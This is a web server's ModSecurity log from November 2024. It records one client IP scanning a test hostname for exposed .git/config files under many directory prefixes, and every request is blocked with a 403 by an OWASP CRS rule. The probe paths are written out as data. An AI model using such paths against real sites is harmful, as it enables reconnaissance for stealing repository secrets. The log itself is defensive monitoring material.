[Sun Nov 17 23:56:43.238633 2024] [:error] [pid 3372496] [client 179.43.189.138:55624] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/js/libs/.git/config"] [unique_id "Zzp0qxWQPpYJ_QjvKbg8hwAAABA"]
[Sun Nov 17 23:56:43.242942 2024] [:error] [pid 3372502] [client 179.43.189.138:55644] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "Zzp0q4Lfag_6rex-FNVRNQAAABc"]
[Sun Nov 17 23:56:43.243361 2024] [:error] [pid 3372502] [client 179.43.189.138:55644] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "Zzp0q4Lfag_6rex-FNVRNQAAABc"]
[Sun Nov 17 23:56:43.243533 2024] [:error] [pid 3372498] [client 179.43.189.138:55628] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /source/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/source/.git/config"] [unique_id "Zzp0q_3-4Zu06LNKtEFVbAAAABM"]
[Sun Nov 17 23:56:43.243781 2024] [:error] [pid 3372502] [client 179.43.189.138:55644] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "Zzp0q4Lfag_6rex-FNVRNQAAABc"]
[Sun Nov 17 23:56:43.243842 2024] [:error] [pid 3372498] [client 179.43.189.138:55628] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/source/.git/config"] [unique_id "Zzp0q_3-4Zu06LNKtEFVbAAAABM"]
[Sun Nov 17 23:56:43.244045 2024] [:error] [pid 3372498] [client 179.43.189.138:55628] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/source/.git/config"] [unique_id "Zzp0q_3-4Zu06LNKtEFVbAAAABM"]
[Sun Nov 17 23:56:43.246077 2024] [:error] [pid 3386427] [client 179.43.189.138:55660] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/css../.git/config"] [unique_id "Zzp0qw5EWeoyGe8h9FctMgAAAAI"]
[Sun Nov 17 23:56:43.246399 2024] [:error] [pid 3386427] [client 179.43.189.138:55660] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/css../.git/config"] [unique_id "Zzp0qw5EWeoyGe8h9FctMgAAAAI"]
[Sun Nov 17 23:56:43.246613 2024] [:error] [pid 3386427] [client 179.43.189.138:55660] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/css../.git/config"] [unique_id "Zzp0qw5EWeoyGe8h9FctMgAAAAI"]
[Sun Nov 17 23:56:43.247234 2024] [:error] [pid 3372500] [client 179.43.189.138:55654] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /admin/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.git/config"] [unique_id "Zzp0qyXNrulCFj7TKS97JAAAABU"]
[Sun Nov 17 23:56:43.247897 2024] [:error] [pid 3372500] [client 179.43.189.138:55654] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.git/config"] [unique_id "Zzp0qyXNrulCFj7TKS97JAAAABU"]
[Sun Nov 17 23:56:43.248285 2024] [:error] [pid 3372500] [client 179.43.189.138:55654] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.git/config"] [unique_id "Zzp0qyXNrulCFj7TKS97JAAAABU"]
[Sun Nov 17 23:56:43.273040 2024] [:error] [pid 3368396] [client 179.43.189.138:55664] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /template/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/template/.git/config"] [unique_id "Zzp0qzXg56NcKc-8l0FIDQAAAAU"]
[Sun Nov 17 23:56:43.273321 2024] [:error] [pid 3368396] [client 179.43.189.138:55664] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/template/.git/config"] [unique_id "Zzp0qzXg56NcKc-8l0FIDQAAAAU"]
[Sun Nov 17 23:56:43.273545 2024] [:error] [pid 3368396] [client 179.43.189.138:55664] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/template/.git/config"] [unique_id "Zzp0qzXg56NcKc-8l0FIDQAAAAU"]
[Sun Nov 17 23:56:43.278375 2024] [:error] [pid 3372501] [client 179.43.189.138:55676] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /templates/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/templates/.git/config"] [unique_id "Zzp0q8PhACgxtlj_6Rz5dgAAABY"]
[Sun Nov 17 23:56:43.278676 2024] [:error] [pid 3372501] [client 179.43.189.138:55676] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/templates/.git/config"] [unique_id "Zzp0q8PhACgxtlj_6Rz5dgAAABY"]
[Sun Nov 17 23:56:43.278931 2024] [:error] [pid 3372501] [client 179.43.189.138:55676] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/templates/.git/config"] [unique_id "Zzp0q8PhACgxtlj_6Rz5dgAAABY"]
[Sun Nov 17 23:56:43.280342 2024] [:error] [pid 3370338] [client 179.43.189.138:55682] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /views/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/views/.git/config"] [unique_id "Zzp0q4tN8Fx1_F3WiUqMagAAAAc"]
[Sun Nov 17 23:56:43.280913 2024] [:error] [pid 3370338] [client 179.43.189.138:55682] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/views/.git/config"] [unique_id "Zzp0q4tN8Fx1_F3WiUqMagAAAAc"]
[Sun Nov 17 23:56:43.281384 2024] [:error] [pid 3370338] [client 179.43.189.138:55682] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/views/.git/config"] [unique_id "Zzp0q4tN8Fx1_F3WiUqMagAAAAc"]
[Sun Nov 17 23:56:43.283974 2024] [:error] [pid 3386431] [client 179.43.189.138:55696] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /layout/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/layout/.git/config"] [unique_id "Zzp0q0sENrDzGr7aL2wm7gAAAAg"]
[Sun Nov 17 23:56:43.284193 2024] [:error] [pid 3386431] [client 179.43.189.138:55696] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/layout/.git/config"] [unique_id "Zzp0q0sENrDzGr7aL2wm7gAAAAg"]
[Sun Nov 17 23:56:43.284362 2024] [:error] [pid 3386431] [client 179.43.189.138:55696] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/layout/.git/config"] [unique_id "Zzp0q0sENrDzGr7aL2wm7gAAAAg"]
[Sun Nov 17 23:56:43.285615 2024] [:error] [pid 3372499] [client 179.43.189.138:55704] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /media/uploads/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/media/uploads/.git/config"] [unique_id "Zzp0qzQl9SjVY23u354zeAAAABQ"]
[Sun Nov 17 23:56:43.286204 2024] [:error] [pid 3372499] [client 179.43.189.138:55704] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/media/uploads/.git/config"] [unique_id "Zzp0qzQl9SjVY23u354zeAAAABQ"]
[Sun Nov 17 23:56:43.286609 2024] [:error] [pid 3372499] [client 179.43.189.138:55704] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/media/uploads/.git/config"] [unique_id "Zzp0qzQl9SjVY23u354zeAAAABQ"]
[Sun Nov 17 23:56:43.308180 2024] [:error] [pid 3372496] [client 179.43.189.138:55714] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /files/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/files/.git/config"] [unique_id "Zzp0qxWQPpYJ_QjvKbg8iAAAABA"]
[Sun Nov 17 23:56:43.308631 2024] [:error] [pid 3372496] [client 179.43.189.138:55714] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/files/.git/config"] [unique_id "Zzp0qxWQPpYJ_QjvKbg8iAAAABA"]
[Sun Nov 17 23:56:43.309130 2024] [:error] [pid 3372496] [client 179.43.189.138:55714] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/files/.git/config"] [unique_id "Zzp0qxWQPpYJ_QjvKbg8iAAAABA"]
[Sun Nov 17 23:56:43.313616 2024] [:error] [pid 3372502] [client 179.43.189.138:55716] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /resources/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/resources/.git/config"] [unique_id "Zzp0q4Lfag_6rex-FNVRNgAAABc"]
[Sun Nov 17 23:56:43.314000 2024] [:error] [pid 3372502] [client 179.43.189.138:55716] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/resources/.git/config"] [unique_id "Zzp0q4Lfag_6rex-FNVRNgAAABc"]
[Sun Nov 17 23:56:43.314320 2024] [:error] [pid 3372502] [client 179.43.189.138:55716] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/resources/.git/config"] [unique_id "Zzp0q4Lfag_6rex-FNVRNgAAABc"]
[Sun Nov 17 23:56:43.316272 2024] [:error] [pid 3372498] [client 179.43.189.138:55730] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /modules/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.git/config"] [unique_id "Zzp0q_3-4Zu06LNKtEFVbQAAABM"]
[Sun Nov 17 23:56:43.316578 2024] [:error] [pid 3372498] [client 179.43.189.138:55730] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.git/config"] [unique_id "Zzp0q_3-4Zu06LNKtEFVbQAAABM"]
[Sun Nov 17 23:56:43.316863 2024] [:error] [pid 3372498] [client 179.43.189.138:55730] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/modules/.git/config"] [unique_id "Zzp0q_3-4Zu06LNKtEFVbQAAABM"]
[Sun Nov 17 23:56:43.319762 2024] [:error] [pid 3372500] [client 179.43.189.138:55738] [client 179.43.189.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /plugins/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.git/config"] [unique_id "Zzp0qyXNrulCFj7TKS97JQAAABU"]
[Sun Nov 17 23:56:43.320266 2024] [:error] [pid 3372500] [client 179.43.189.138:55738] [client 179.43.189.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.git/config"] [unique_id "Zzp0qyXNrulCFj7TKS97JQAAABU"]
[Sun Nov 17 23:56:43.320651 2024] [:error] [pid 3372500] [client 179.43.189.138:55738] [client 179.43.189.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.git/config"] [unique_id "Zzp0qyXNrulCFj7TKS97JQAAABU"]
